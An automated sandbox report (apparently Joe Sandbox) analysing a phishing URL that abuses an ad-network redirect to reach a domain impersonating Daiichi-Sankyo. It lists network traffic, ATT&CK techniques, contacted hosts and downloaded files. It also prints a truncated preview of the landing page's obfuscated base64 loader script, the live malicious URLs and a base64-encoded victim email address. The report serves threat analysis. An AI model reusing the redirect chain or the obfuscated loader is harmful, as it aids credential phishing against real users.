Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: classification engineClassification label: mal52.win@19/17@24/12
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2220,i,6973843325363131521,10193747245632863849,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2220,i,6973843325363131521,10193747245632863849,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/100%Avira URL Cloudmalware
https://daiichi-sankyo.uronfecit.ru/favicon.ico100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    code.jquery.com
    151.101.194.137
    truefalse
      high
      cdnjs.cloudflare.com
      104.17.24.14
      truefalse
        high
        challenges.cloudflare.com
        104.18.94.41
        truefalse
          high
          www.google.com
          142.250.74.196
          truefalse
            high
            ib.anycast.adnxs.com
            185.89.210.212
            truefalse
              high
              daiichi-sankyo.uronfecit.ru
              188.114.96.3
              truetrue
                unknown
                ib.adnxs.com
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://daiichi-sankyo.uronfecit.ru/favicon.icofalse
                  • Avira URL Cloud: malware
                  unknown
                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe2815f5f9a43d9/1736237784604/1Z4TLpLdSCaC96Afalse
                    high
                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                      high
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe2815f5f9a43d9&lang=autofalse
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/21577938:1736234858:tqilWgxS_EsW8SSjchFDEnaIce_aADwik1qCA_CqtGY/8fe2815f5f9a43d9/xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AEfalse
                          high
                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                            high
                            https://ib.adnxs.com/bounce?%2Fsbounce%3F%252Fgetuid%253Fhttps%25253a%25252f%25252fDaiichi-sankyo.uronfecit.ru%252FHlnz62kK%252Ffalse
                              high
                              https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/true
                              • Avira URL Cloud: malware
                              unknown
                              http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/false
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                  high
                                  https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/false
                                      high
                                      https://ib.adnxs.com/sbounce?%2Fgetuid%3Fhttps%253a%252f%252fDaiichi-sankyo.uronfecit.ru%2FHlnz62kK%2Ffalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.17.24.14
                                        cdnjs.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        185.89.210.212
                                        ib.anycast.adnxs.comGermany
                                        29990ASN-APPNEXUSfalse
                                        104.18.94.41
                                        challenges.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        104.18.95.41
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        185.89.210.90
                                        unknownGermany
                                        29990ASN-APPNEXUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        188.114.96.3
                                        daiichi-sankyo.uronfecit.ruEuropean Union
                                        13335CLOUDFLARENETUStrue
                                        151.101.66.137
                                        unknownUnited States
                                        54113FASTLYUSfalse
                                        151.101.194.137
                                        code.jquery.comUnited States
                                        54113FASTLYUSfalse
                                        35.190.80.1
                                        a.nel.cloudflare.comUnited States
                                        15169GOOGLEUSfalse
                                        142.250.74.196
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        IP
                                        192.168.2.4
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1585184
                                        Start date and time:2025-01-07 09:15:14 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 2m 58s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:browseurl.jbs
                                        Sample URL:http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal52.win@19/17@24/12
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 142.250.185.131, 216.58.206.78, 74.125.133.84, 142.250.185.78, 142.250.181.238, 172.217.16.206, 199.232.214.172, 192.229.221.95, 216.58.212.174, 142.250.185.238, 142.250.185.174, 142.250.184.206, 142.250.185.142, 142.250.186.67, 23.56.254.164, 20.12.23.50, 13.107.246.45
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, xandr-g-geo.trafficmanager.net, update.googleapis.com, clients.l.google.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==
                                        No simulations
                                        No context
                                        No context
                                        No context
                                        No context
                                        No context
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                        Category:dropped
                                        Size (bytes):48316
                                        Entropy (8bit):5.6346993394709
                                        Encrypted:false
                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                        MD5:2CA03AD87885AB983541092B87ADB299
                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                        Malicious:false
                                        Reputation:low
                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                        Category:downloaded
                                        Size (bytes):48316
                                        Entropy (8bit):5.6346993394709
                                        Encrypted:false
                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                        MD5:2CA03AD87885AB983541092B87ADB299
                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                        Malicious:false
                                        Reputation:low
                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 30 x 9, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):61
                                        Entropy (8bit):4.068159130770306
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPlIlEuJpAkxl/k4E08up:6v/lhPGE0pAk7Tp
                                        MD5:1A30C33DA708D3A819DC94D686483CFA
                                        SHA1:84EADAD57FB2535CF4720DD7CFEB72FE56D84A66
                                        SHA-256:9BD361B1B241FABD4CA2E069732035B13F1CBD528EEC75283A9ADBD71F041A36
                                        SHA-512:F2899737B1BA424966F9A2505507373C88E3461A87E0B89D45725F66D2E5BB119C44CD19566157E6346DCFD5BE195A189CDE3257A22A47D06AA4B2F47FB64F6C
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR.....................IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65447)
                                        Category:dropped
                                        Size (bytes):89501
                                        Entropy (8bit):5.289893677458563
                                        Encrypted:false
                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                        Malicious:false
                                        Reputation:low
                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                        Category:downloaded
                                        Size (bytes):61
                                        Entropy (8bit):3.990210155325004
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65447)
                                        Category:downloaded
                                        Size (bytes):89501
                                        Entropy (8bit):5.289893677458563
                                        Encrypted:false
                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                        Malicious:false
                                        Reputation:low
                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (7517), with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):19936
                                        Entropy (8bit):5.88305433767756
                                        Encrypted:false
                                        SSDEEP:384:ZnuRhjc+iDVvxQ+avml7nuRhjc+iDVvxQ+avmlalrxlrv:+4TZQ+eUU4TZQ+eUalrxlrv
                                        MD5:D0A61F2279F3AF675D47137EB3D7BFA4
                                        SHA1:050953C627C912C045DFC89BAB4DBFE7D4998493
                                        SHA-256:9357A88B94FFA484B3452EB123AE7E273DE0ECECBAE2525D63AA057E3B928C31
                                        SHA-512:CEE0B17E95A30619F885271372B0E4743EC3942FF177F0CE2647B4EFA41CF1058697C87171652A51CBE1A47E9248F1383697CF4EEFD0543788E02E155BF1A1FA
                                        Malicious:false
                                        Reputation:low
                                        URL:https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/
                                        Preview: Success in business requires training, discipline, and hard work. -->....<script>....if(atob("aHR0cHM6Ly9sZFQudXJvbmZlY2l0LnJ1L0hsbno2MmtLLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQo
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 30 x 9, 8-bit/color RGB, non-interlaced
                                        Category:downloaded
                                        Size (bytes):61
                                        Entropy (8bit):4.068159130770306
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPlIlEuJpAkxl/k4E08up:6v/lhPGE0pAk7Tp
                                        MD5:1A30C33DA708D3A819DC94D686483CFA
                                        SHA1:84EADAD57FB2535CF4720DD7CFEB72FE56D84A66
                                        SHA-256:9BD361B1B241FABD4CA2E069732035B13F1CBD528EEC75283A9ADBD71F041A36
                                        SHA-512:F2899737B1BA424966F9A2505507373C88E3461A87E0B89D45725F66D2E5BB119C44CD19566157E6346DCFD5BE195A189CDE3257A22A47D06AA4B2F47FB64F6C
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe2815f5f9a43d9/1736237784604/1Z4TLpLdSCaC96A
                                        Preview:.PNG........IHDR.....................IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (47520)
                                        Category:dropped
                                        Size (bytes):47521
                                        Entropy (8bit):5.398500199255723
                                        Encrypted:false
                                        SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                        MD5:301F68F3D8317AB22D4021E266C9A853
                                        SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                        SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                        SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                        Malicious:false
                                        Reputation:low
                                        Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (47520)
                                        Category:downloaded
                                        Size (bytes):47521
                                        Entropy (8bit):5.398500199255723
                                        Encrypted:false
                                        SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                        MD5:301F68F3D8317AB22D4021E266C9A853
                                        SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                        SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                        SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.js
